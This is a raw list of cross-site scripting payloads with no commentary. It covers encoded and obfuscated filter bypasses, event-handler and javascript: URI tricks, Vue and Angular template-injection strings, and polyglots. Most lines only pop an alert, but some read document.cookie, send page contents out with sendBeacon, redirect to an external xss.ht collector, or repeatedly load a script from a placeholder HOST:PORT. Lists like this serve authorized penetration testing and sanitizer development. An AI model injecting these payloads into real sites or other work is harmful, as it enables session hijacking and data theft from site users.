<XSS STYLE="xss:expression(alert('XSS'))">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
#<iframe src="javascript:alert('XSS');"></iframe>
#<body onload="alert('XSS')">
d="alert('XSS');\")";
echo('IPT>alert("XSS")</SCRIPT>'); ?>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<Video> <source onerror = "javascript: alert (XSS)">
(A(%22onerror='alert%601%60'testabcd))/
<applet code="javascript:confirm(document.cookie);">
<isindex x="javascript:" onmouseover="alert(XSS)">
"><img src="x:x" onerror="alert(XSS)">
<img src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/onerror='eval(src)'>
<style>//*{x:expression(alert(/xss/))}//<style></style>
<img src="/" =_=" title="onerror='prompt(1)'">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe
<script x> alert(1) </script 1=2
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<form><button formaction=javascript&colon;alert(1)>CLICKME
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
a=alert,a(1)
[1].find(alert)
top[“al”+”ert”](1)
top[al\x65rt](1)
top[8680439..toString(30)](1)
<button onClick="alert('xss')">Submit</button>
<svg><animate onend=alert(1) attributeName=x dur=1s>
<audio src/onerror=alert(1)>
<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>
<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>
<iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;></iframe>
<iframe src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>
<img src=x onerror=location=atob`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`>
<script>onerror=alert;throw 1</script>
<script>{onerror=alert}throw 1</script>
<script>throw onerror=alert,1</script>
<script>throw onerror=eval,e=new Error,e.message='alert\x281\x29',e</script>
<script>throw onerror=Uncaught=eval,e=new Error,e.message='/*'+location.hash,!!window.InstallTrigger?e:e.message</script>
<script>throw/x/,onerror=Uncaught=eval,h=location.hash,e=Error,e.lineNumber=e.columnNumber=e.fileName=e.message=h[2]+h[1]+h,!!window.InstallTrigger?e:e.message</script>
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
<script>location='javascript:alert\x281\x29'</script>
<script>location=name</script>
<script>alert`1`</script>
<script>throw[onerror]=[alert],1</script>
<script>var{haha:onerror=alert}=0;throw 1</script>
<script>new Function`X${document.location.hash.substr`1`}`</script>
<script>Function`X${document.location.hash.substr`1`}```</script>
<script>var{a:onerror}={a:alert};throw 1</script>
blah(""+new class b{toString=e=>location=name}+"")</script>
<xss class=progress-bar-animated onanimationstart=alert(1)>
<script>import('data:text/javascript,alert(1)')</script>
<xss class="carousel slide" data-ride=carousel data-interval=100 ontransitionend=alert(1)><xss class=carousel-inner><xss class="carousel-item active"></xss><xss class=carousel-item></xss></xss></xss>
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
<iframe srcdoc="&lt;img src=1 onerror=alert(1)&gt;"></iframe>
<a href="&#X6A;avascript:alert(1)">XSS</a>
<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>
<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label>
<script>\u0061lert(1)</script>
<script>\u{61}lert(1)</script>
<script>eval('\x61lert(1)')</script>
<a href="&#0000106avascript:alert(1)">XSS</a>
<a href="&#x6a;avascript:alert(1)">XSS</a>
≋ "><!'/*"*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm(document.domain) //># ≋
%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74
">'><details/open/ontoggle=confirm('XSS')>
<input type="hidden" value="mypayload" /> %22%20autofocus%20onfocus%3d(confirm)(1)%2f%2f
%22%20autofocus%20onfocus%00%3d(confirm)(1)%2f%2f
javascript:new%20Function`al\ert\`1\``;
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
&lt;script&gt;alert(1)&lt;/script&gt;
&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;
&amp;amp;lt;script&amp;amp;gt;alert(1)&amp;amp;lt;/script&amp;amp;gt;
&amp;amp;amp;lt;script&amp;amp;amp;gt;alert(1)&amp;amp;amp;lt;/script&amp;amp;amp;gt;
&amp;amp;amp;amp;lt;script&amp;amp;amp;amp;gt;alert(1)&amp;amp;amp;amp;lt;/script&amp;amp;amp;amp;gt;
&lt;img src=1 onerror=alert(1)&gt;
&amp;lt;img src=1 onerror=alert(1)&amp;gt;
&amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;gt;
&amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;gt;
&amp;amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;amp;gt;
"&lt;img src=1 onerror=alert(1)&gt;
"&amp;lt;img src=1 onerror=alert(1)&amp;gt;
"&amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;gt;
"&amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;gt;
"&amp;amp;amp;amp;lt;img src=1 onerror=alert(1)&amp;amp;amp;amp;gt;
"&gt;&lt;img src=x onerror=prompt(document.domain);&gt;
"&amp;gt;&amp;lt;img src=x onerror=prompt(document.domain);&amp;gt;
"&amp;amp;gt;&amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;gt;
"&amp;amp;amp;gt;&amp;amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;amp;gt;
"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;amp;amp;gt;
"&amp;amp;amp;amp;amp;gt;&amp;amp;amp;amp;amp;lt;img src=x onerror=prompt(document.domain);&amp;amp;amp;amp;amp;gt;
”&gt;&lt;svg onload=alert&amp;#0000000040"1")&gt;
”&amp;gt;&amp;lt;svg onload=alert&amp;amp;#0000000040"1")&amp;gt;
”&amp;amp;gt;&amp;amp;lt;svg onload=alert&amp;amp;amp;#0000000040"1")&amp;amp;gt;
”&amp;amp;amp;gt;&amp;amp;amp;lt;svg onload=alert&amp;amp;amp;amp;#0000000040"1")&amp;amp;amp;gt;
”&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;svg onload=alert&amp;amp;amp;amp;amp;#0000000040"1")&amp;amp;amp;amp;gt;
"&gt;&lt;svg onload=alert(1)&gt;
"&amp;gt;&amp;lt;svg onload=alert(1)&amp;gt;
"&amp;amp;gt;&amp;amp;lt;svg onload=alert(1)&amp;amp;gt;
"&amp;amp;amp;gt;&amp;amp;amp;lt;svg onload=alert(1)&amp;amp;amp;gt;
"&amp;amp;amp;amp;gt;&amp;amp;amp;amp;lt;svg onload=alert(1)&amp;amp;amp;amp;gt;
&lt;img/src/onerror=alert(`ibro`)&gt;
&amp;lt;img/src/onerror=alert(`ibro`)&amp;gt;
&amp;amp;lt;img/src/onerror=alert(`ibro`)&amp;amp;gt;
&amp;amp;amp;lt;img/src/onerror=alert(`ibro`)&amp;amp;amp;gt;
&amp;amp;amp;amp;lt;img/src/onerror=alert(`ibro`)&amp;amp;amp;amp;gt;
javascript:\/\/\'\/<\/title><\/style><\/textarea><\/script>--><p%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B\'%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+\'Audi%20RS5\'.substr(0,4)}}XXX%3Cscript%3Ealert(\'XSS\')
javascript:\\\/\\\/\\\'\\\/<\\\/title><\\\/style><\\\/textarea><\\\/script>--><p%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B\\\'%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+\\\'Audi%20RS5\\\'.substr(0,4)}}XXX%3Cscript%3Ealert(\\\'XSS\\\')
javascript:\\\\\\\/\\\\\\\/\\\\\\\'\\\\\\\/<\\\\\\\/title><\\\\\\\/style><\\\\\\\/textarea><\\\\\\\/script>--><p%22%20%0D%20%0A%20onclick%3Dalert(123)%2F%2F%3E*%2Falert()%2F*%3Cimg%20src%3Dx%20onerror%3Dalert(456)%2F%3E%3Csvg%2Fonload%3Dprompt(789)%2F%3E%3B\\\\\\\'%22%2F%2F%20%3A%3Bfn()%3B%0A%0D%0A%0D%0A%0D%0A%09{{12*12+\\\\\\\'Audi%20RS5\\\\\\\'.substr(0,4)}}XXX%3Cscript%3Ealert(\\\\\\\'XSS\\\\\\\')
javascript:\/\/%250Aalert(1)
javascript:\\\/\\\/%250Aalert(1)
javascript:\\\\\\\/\\\\\\\/%250Aalert(1)
javascript:\\\\\\\\\\\\\\\/\\\\\\\\\\\\\\\/%250Aalert(1)
jaVasCript:\/*-\/*`\/*\\`\/*\'\/*\"\/**\/(\/* *\/oNcliCk=alert() )\/\/%0D%0A%0D%0A\/\/<\/stYle\/<\/titLe\/<\/teXtarEa\/<\/scRipt\/--!>\\x3csVg\/<sVg\/oNloAd=alert()\/\/>\\x3e
jaVasCript:\\\/*-\\\/*`\\\/*\\\\`\\\/*\\\'\\\/*\\\"\\\/**\\\/(\\\/* *\\\/oNcliCk=alert() )\\\/\\\/%0D%0A%0D%0A\\\/\\\/<\\\/stYle\\\/<\\\/titLe\\\/<\\\/teXtarEa\\\/<\\\/scRipt\\\/--!>\\\\x3csVg\\\/<sVg\\\/oNloAd=alert()\\\/\\\/>\\\\x3e
jaVasCript:\\\\\\\/*-\\\\\\\/*`\\\\\\\/*\\\\\\\\`\\\\\\\/*\\\\\\\'\\\\\\\/*\\\\\\\"\\\\\\\/**\\\\\\\/(\\\\\\\/* *\\\\\\\/oNcliCk=alert() )\\\\\\\/\\\\\\\/%0D%0A%0D%0A\\\\\\\/\\\\\\\/<\\\\\\\/stYle\\\\\\\/<\\\\\\\/titLe\\\\\\\/<\\\\\\\/teXtarEa\\\\\\\/<\\\\\\\/scRipt\\\\\\\/--!>\\\\\\\\x3csVg\\\\\\\/<sVg\\\\\\\/oNloAd=alert()\\\\\\\/\\\\\\\/>\\\\\\\\x3e
window['alert']()
this['alert']()
(alert)()
eval(atob('YWxlcnQoKQ=='))
document['cookie']
<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>
<input onauxclick=alert(1)>
<video onfullscreenchange=alert(1) src=validvideo.mp4 controls>
<input oninput=alert(1) value=xss>
<xss onkeypress="alert(1)" contenteditable style=display:block>test</xss>
<a onpaste="alert(1)" contenteditable>test</a>
%EF%BC%9Cscript%EF%BC%9E alert() %EF%BC%9C/script%EF%BC%9E
%EF%BC%9Cscript%EF%BC%9Ealert()%EF%BC%9C/script%EF%BC%9E
%EF%BC%9Cimg%20src%3Dxxx%20onerror%3Dalert(1)%EF%BC%9E
%3Cimg%20src=xx%20onerror=alert(1)%3E
<xss onafterscriptexecute=alert(1)><script>1</script>
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss>
<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>
<body onbeforeprint=console.log(1)>
<xss onbeforescriptexecute=alert(1)><script>1</script>
<body onbeforeunload=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>
<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
<audio controls ondurationchange=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>
<a id=x tabindex=1 onfocus=alert(1)></a>
<acronym id=x tabindex=1 onfocus=alert(1)></acronym>
<address id=x tabindex=1 onfocus=alert(1)></address>
<applet id=x tabindex=1 onfocus=alert(1)></applet>
<img usemap=#x><map name="x"><area href onfocus=alert(1) id=x>
<button autofocus onfocus=alert(1)>test</button>
<data id=x tabindex=1 onfocus=alert(1)></data>
<footer id=x tabindex=1 onfocus=alert(1)></footer>
<form id=x tabindex=1 onfocus=alert(1)></form>
<frameset><frame id=x onfocus=alert(1)>
<head id=x tabindex=1 onfocus=alert(1) style=display:block></head>
<img id=x tabindex=1 onfocus=alert(1)></img>
<image id=x tabindex=1 onfocus=alert(1)></image>
<svg><animate onbegin=alert(1) attributeName=x dur=1s>
<audio autoplay onloadedmetadata=alert(1)> <source src="validaudio.wav" type="audio/wav"></audio>
<body onmessage=print()>
<body onresize="print()">
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
<details ontoggle=alert(1) open>test</details>
<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>
<xss draggable="true" ondragleave="alert(1)" style=display:block>test</xss>
<body onpageshow=alert(1)>
<body onpopstate=print()>
<audio controls onprogress=alert(1)><source src=validaudio.mp3 type=audio/mpeg></audio>
<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />
<xss onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><span id=x>test</span></xss>
<noembed><img title="</noembed><img src onerror=alert(1)>"></noembed>
<style><img title="</style><img src onerror=alert(1)>"></style>
<textarea><img title="</textarea><img src onerror=alert(1)>"></textarea>
<title><img title="</title><img src onerror=alert(1)>"></title>
<noscript><img title="</noscript><img src onerror=alert(1)>"></noscript>
<noframes><img title="</noframes><img src onerror=alert(1)>"></noframes>
<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>
<xmp><img title="</xmp><img src onerror=alert(1)>"></xmp>
{{_s.constructor('alert(1)')()}}
#{{_s.constructor('alert(1)')()}}
<p v-show="_c.constructor`alert(1)`()">
<x v-on:click='_b.constructor`alert(1)`()'>click</x>
<x :[_b.constructor`alert(1)`()]>
<p :=_c.constructor`alert(1)`()>
<x @click='_b.constructor`alert(1)`()'>click</x>
<x title"="&lt;iframe&Tab;onload&Tab;=alert(1)&gt;">
<x title"="&lt;iframe&Tab;onload&Tab;=setTimeout(/alert(1)/.source)&gt;">
{{$el.innerHTML='\u003cimg src onerror=alert(1)\u003e'}}
\u003cimg src onerror=alert(1)\u003e
"><image/src/onerror=prompt("ibrahimxss")>
"><ImG%20sRc=x%20onErroR=prompt`ibrahimxss`>
';alert("ibrahimxss");//
“>-setTimeout`\u0028alert(1)\u0029`-
</option><img src=x onerror=alert(origin)>
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>
javascript:74163166147401571561541571411447514115414516216450615176
%22%3EEnter_Mouse_Pointer_Here_to_get_XSS%3C%5K/onpointerenter=alert(location)%3E%3!
<img src=”invalid-image” onerror=”alert(document.cookie)”>
"{text:<img/src=x onload=confirm(1)>}"
{text:<img/src=x onload=confirm(1)>}
%7b%0a%20%20%22%64%61%74%61%22%3a%20%22%7b%74%65%78%74%3a%3c%69%6d%67%2f%73%72%63%3d%78%20%6f%6e%6c%6f%61%64%3d%63%6f%6e%66%69%72%6d%28%31%29%3e%7d%22%2c%0a%20%20%22%65%76%65%6e%74%49%44%22%3a%20%32%33%34%32%33%0a%7d
“autofocus onclick=alert()
“autofocus onclick=&#97;lert()
ibrahimxss“autofocus onclick=&#97;lert()
<script type="text/javascript">javascript:alert(1);</script>
“><script>alert(1);</script>
"><img/src=x/onerro=6><img/src="1"/onerror=alert(1);>?test=test
"><img/src=x/onerro=6><img/src="1"/onerror=alert(1);>
<img/src=x/onerro=6><img/src="1"/onerror=alert(1);>?test=test
"><img/src=x/onerro=6><img/src="1"/onerror=import(location.search.split("aa=").pop());>
%22%3E%3Cimg/src=x/onerro=6%3E%3Cimg/src=%221%22/onerror=alert(1);%3E1
<svg@load=this.alert(1)>
<img src @error=this.alert(1)>
(Z("onerror="a=print,a`1`"))
(Z("onerror="a=console,a.log`${cookie}`"))
<img sr%00c=x o%00nerror=((pro%00mpt(1)))>
<img src @error=e=$event.composedPath().pop().alert(1)>
{{_toDisplayString.constructor('alert(1)')()}}
<teleport to=script:nth-child(2)>alert&lpar;1&rpar;</teleport></div><script></script>
<component is=script text=alert(1)>
<x @click=$event.view.alert(1)>click</x>
<x v-bind:a='_b.constructor`alert(1)`()'>
<a @['c\lic\u{6b}']="_c.constructor('alert(1)')()">test</a>
<img src @error=e=$event.path.pop().alert(1)>
{{_openBlock.constructor('alert(1)')()}}
#{{_openBlock.constructor('alert(1)')()}}
{{_Vue.h.constructor`alert(1)`()}}
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
{{{}.")));alert(1)//"}}
{{!ready && (ready = true) && ( !call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString( 'F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);' )));}}
{}.")));alert(1)//";
'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
xss'''><iframe srcdoc='%26it;script>;prompt` ${document.domain}`%26it;/script>'>
["');alert('xss');//"]@xyz.xxx
<c/onpointerrawupdate=d=document,b=%27%60%27,d[%27loca%27%2B%27tion%27]=%27javascript%26colon;aler%27%2B%27t%27%2Bb%2Bdomain%2Bb>
<svg/onload=location/**/='http://GH0ST.xss.ht/'+document.dom
autofocus ' onfocus='alert(document.domain)'
"autofocus onfocus='alert(document.domain)'
"><svg+onload=alert&amp;#x00"1
"><svg+onload=alert&amp;#x01"1
"><svg+onload=alert&amp;#x02"1
"><svg+onload=alert&amp;#x03"1
"><svg+onload=alert&amp;#x04"1
"><svg+onload=alert&amp;#x05"1
"><svg+onload=alert&amp;#x06"1
"><svg+onload=alert&amp;#x07"1
"><svg+onload=alert&amp;#x08"1
"><svg+onload=alert&amp;#x09"1
"><svg+onload=alert&amp;#x0A"1
"><svg+onload=alert&amp;#x0B"1
"><svg+onload=alert&amp;#x0C"1
"><svg+onload=alert&amp;#x0D"1
"><svg+onload=alert&amp;#x0E"1
"><svg+onload=alert&amp;#x0F"1
"><svg+onload=alert&amp;#x10"1
"><svg+onload=alert&amp;#x11"1
"><svg+onload=alert&amp;#x12"1
"><svg+onload=alert&amp;#x13"1
"><svg+onload=alert&amp;#x14"1
"><svg+onload=alert&amp;#x15"1
"><svg+onload=alert&amp;#x16"1
"><svg+onload=alert&amp;#x17"1
"><svg+onload=alert&amp;#x18"1
"><svg+onload=alert&amp;#x19"1
"><svg+onload=alert&amp;#x1A"1
"><svg+onload=alert&amp;#x1B"1
"><svg+onload=alert&amp;#x1C"1
"><svg+onload=alert&amp;#x1D"1
"><svg+onload=alert&amp;#x1E"1
"><svg+onload=alert&amp;#x1F"1
"><svg+onload=alert&amp;#x20"1
"><svg+onload=alert&amp;#x21"1
"><svg+onload=alert&amp;#x22"1
"><svg+onload=alert&amp;#x23"1
"><svg+onload=alert&amp;#x24"1
"><svg+onload=alert&amp;#x25"1
"><svg+onload=alert&amp;#x26"1
"><svg+onload=alert&amp;#x27"1
"><svg+onload=alert&amp;#x28"1
"><svg+onload=alert&amp;#x29"1
"><svg+onload=alert&amp;#x2A"1
"><svg+onload=alert&amp;#x2B"1
"><svg+onload=alert&amp;#x2C"1
"><svg+onload=alert&amp;#x2D"1
"><svg+onload=alert&amp;#x2E"1
"><svg+onload=alert&amp;#x2F"1
"><svg+onload=alert&amp;#x30"1
"><svg+onload=alert&amp;#x31"1
"><svg+onload=alert&amp;#x32"1
"><svg+onload=alert&amp;#x30"1
"><svg+onload=alert&amp;#x31"1
"><svg+onload=alert&amp;#x32"1
"><svg+onload=alert&amp;#x33"1
"><svg+onload=alert&amp;#x34"1
"><svg+onload=alert&amp;#x35"1
"><svg+onload=alert&amp;#x36"1
"><svg+onload=alert&amp;#x37"1
"><svg+onload=alert&amp;#x38"1
"><svg+onload=alert&amp;#x39"1
"><svg+onload=alert&amp;#x41"1
"><svg+onload=alert&amp;#x42"1
"><svg+onload=alert&amp;#x43"1
"><svg+onload=alert&amp;#x44"1
"><svg+onload=alert&amp;#x45"1
"><svg+onload=alert&amp;#x46"1
"><svg+onload=alert&amp;#x47"1
"><svg+onload=alert&amp;#x48"1
"><svg+onload=alert&amp;#x49"1
"><svg+onload=alert&amp;#x4A"1
"><svg+onload=alert&amp;#x4B"1
"><svg+onload=alert&amp;#x4C"1
"><svg+onload=alert&amp;#x4D"1
"><svg+onload=alert&amp;#x4E"1
"><svg+onload=alert&amp;#x4F"1
"><svg+onload=alert&amp;#x50"1
"><svg+onload=alert&amp;#x51"1
"><svg+onload=alert&amp;#x52"1
"><svg+onload=alert&amp;#x53"1
"><svg+onload=alert&amp;#x54"1
"><svg+onload=alert&amp;#x55"1
"><svg+onload=alert&amp;#x56"1
"><svg+onload=alert&amp;#x57"1
"><svg+onload=alert&amp;#x58"1
"><svg+onload=alert&amp;#x59"1
"><svg+onload=alert&amp;#x5A"1
"><svg+onload=alert&amp;#x5B"1
"><svg+onload=alert&amp;#x5C"1
"><svg+onload=alert&amp;#x5D"1
"><svg+onload=alert&amp;#x5E"1
"><svg+onload=alert&amp;#x5F"1
"><svg+onload=alert&amp;#x60"1
"><svg+onload=alert&amp;#x61"1
"><svg+onload=alert&amp;#x62"1
"><svg+onload=alert&amp;#x63"1
"><svg+onload=alert&amp;#x64"1
"><svg+onload=alert&amp;#x65"1
"><svg+onload=alert&amp;#x66"1
"><svg+onload=alert&amp;#x67"1
"><svg+onload=alert&amp;#x68"1
"><svg+onload=alert&amp;#x69"1
"><svg+onload=alert&amp;#x6A"1
"><svg+onload=alert&amp;#x6B"1
"><svg+onload=alert&amp;#x6C"1
"><svg+onload=alert&amp;#x6D"1
"><svg+onload=alert&amp;#x6E"1
"><svg+onload=alert&amp;#x6F"1
"><svg+onload=alert&amp;#x70"1
"><svg+onload=alert&amp;#x71"1
"><svg+onload=alert&amp;#x72"1
"><svg+onload=alert&amp;#x73"1
"><svg+onload=alert&amp;#x74"1
"><svg+onload=alert&amp;#x75"1
"><svg+onload=alert&amp;#x76"1
"><svg+onload=alert&amp;#x77"1
"><svg+onload=alert&amp;#x78"1
"><svg+onload=alert&amp;#x79"1
"><svg+onload=alert&amp;#x7A"1
"><svg+onload=alert&amp;#x7B"1
"><svg+onload=alert&amp;#x7C"1
"><svg+onload=alert&amp;#x7D"1
"><svg+onload=alert&amp;#x7E"1
"><svg+onload=alert&amp;#x7F"1
"><svg+onload=alert&amp;#x80"1
"><svg+onload=alert&amp;#x81"1
"><svg+onload=alert&amp;#x82"1
"><svg+onload=alert&amp;#x83"1
"><svg+onload=alert&amp;#x84"1
"><svg+onload=alert&amp;#x85"1
"><svg+onload=alert&amp;#x86"1
"><svg+onload=alert&amp;#x87"1
"><svg+onload=alert&amp;#x88"1
"><svg+onload=alert&amp;#x89"1
"><svg+onload=alert&amp;#x8A"1
"><svg+onload=alert&amp;#x8B"1
"><svg+onload=alert&amp;#x8C"1
"><svg+onload=alert&amp;#x8D"1
"><svg+onload=alert&amp;#x8E"1
"><svg+onload=alert&amp;#x8F"1
"><svg+onload=alert&amp;#x90"1
"><svg+onload=alert&amp;#x91"1
"><svg+onload=alert&amp;#x92"1
"><svg+onload=alert&amp;#x93"1
"><svg+onload=alert&amp;#x94"1
"><svg+onload=alert&amp;#x95"1
"><svg+onload=alert&amp;#x96"1
"><svg+onload=alert&amp;#x97"1
"><svg+onload=alert&amp;#x98"1
"><svg+onload=alert&amp;#x99"1
"><svg+onload=alert&amp;#x107"1
"><svg+onload=alert&amp;#x9A"1
<x onxxx=alert(1) 1='
"><img src=x onerror=prompt&#x000000028;document&#x00000002E;domain&#x000000029;&#x00000003B;>
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
'onload=alert(1)><svg/1='
'>alert(1)</script><script/1='
*/alert(1)</script><script>/*
*/alert(1)">'onload="/*<svg/1='
`-alert(1)">'onload="`<svg/1='
*/</script>'>alert(1)/*<script/1='
<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<event-source src=javascript:alert(1)>
<iMg onerror=alert(1) src=a>
<[%00]img onerror=alert(1) src=a>
<i[%00]mg onerror=alert(1) src=a>
<img[%09]onerror=alert(1) src=a>
<img[%0a]onerror=alert(1) src=a>
<img/onerror=alert(1) src=a>
<img/anyjunk/onerror=alert(1) src=a>
<img o[%00]nerror=alert(1) src=a>
<img onerror=a[%00]lert(1) src=a>
<img onerror=a&#x6c;ert(1) src=a>
<iframe src=j&#x61;vasc&#x72ipt&#x3a;alert&#x28;1&#x29;>
<img onerror=a&#x06c;ert(1) src=a>
<img onerror=a&#x006c;ert(1) src=a>
<img onerror=a&#108;ert(1) src=a>
<img onerror=a&#108ert(1) src=a>
<img onerror=a&#0108ert(1) src=a>
<img onerror=eval(al&#x5c;u0065rt(1))src=a>
<imgonerror=&#x65;&#x76;&#x61;&#x6c;&#x28;&#x27;al&#x5c;u0065rt&#x28;1& #x29;&#x27;&#x29; src=a
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
"><img src=1 onerror=alert(1)>.gif
";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt'](1)/*\*/ }, 5000);"></inpuT%3E;
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image src/onerror=prompt(8)>
<img src/onerror=prompt(8)>
<image src =q onerror=prompt(8)>
<img src =q onerror=prompt(8)>
</scrip</script>t><img src =q onerror=prompt(8)>
<svg onload=alert(1)>
"><svg onload=alert(1)//
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
'-alert(1)//
1"--></script><svg/onload=';alert(document.domain);'>
" onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
“ onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
